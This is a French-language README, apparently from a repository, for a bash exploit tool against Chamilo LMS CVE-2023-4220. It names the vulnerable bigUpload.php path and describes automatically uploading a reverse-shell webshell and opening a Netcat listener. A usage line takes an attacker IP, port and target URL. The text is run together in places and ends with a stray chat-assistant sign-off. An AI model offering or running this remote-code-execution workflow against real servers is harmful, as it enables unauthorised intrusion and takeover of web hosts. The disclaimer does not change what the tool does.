
Refurbish Chamilo LMS CVE-2023-4220 exploit écrit en bash
Ce script exploite une vulnérabilité d'exécution de code à distance (RCE) dans Chamilo LMS versions ≤ v1.11.24. La vulnérabilité (CVE-2023-4220) existe en raison d'une fonctionnalité de téléchargement de fichier sans restriction dans la fonction bigUpload.php de Chamilo LMS, qui permet aux attaquants de télécharger des fichiers arbitraires (tels que des webshells) et de les exécuter, conduisant à une exécution complète de code à distance sur le serveur.
Ce script a été amélioré par Divine Clown pour rationaliser le processus d'exploitation, en générant automatiquement un fichier de reverse shell, en le téléchargeant sur la cible, et en lançant un écouteur pour donner à l'attaquant un accès direct au shell.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip> : L'adresse IP de l'attaquant pour le reverse shell.-p <port> : Le port sur lequel l'écouteur Netcat sera démarré.-h <host_link> : L'URL complète de l'instance vulnérable de Chamilo LMS../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Cet outil est destiné uniquement à des fins éducatives et à des environnements de test où vous avez une autorisation explicite pour exploiter des vulnérabilités. L'accès non autorisé aux systèmes est illégal et peut entraîner des poursuites pénales. Les auteurs ne seront pas tenus responsables de toute mauvaise utilisation ou des dommages causés par ce script.
N'hésitez pas à modifier ce README davantage si vous souhaitez inclure des informations ou une mise en forme supplémentaires ! Faites-moi savoir si vous avez besoin d'autre chose.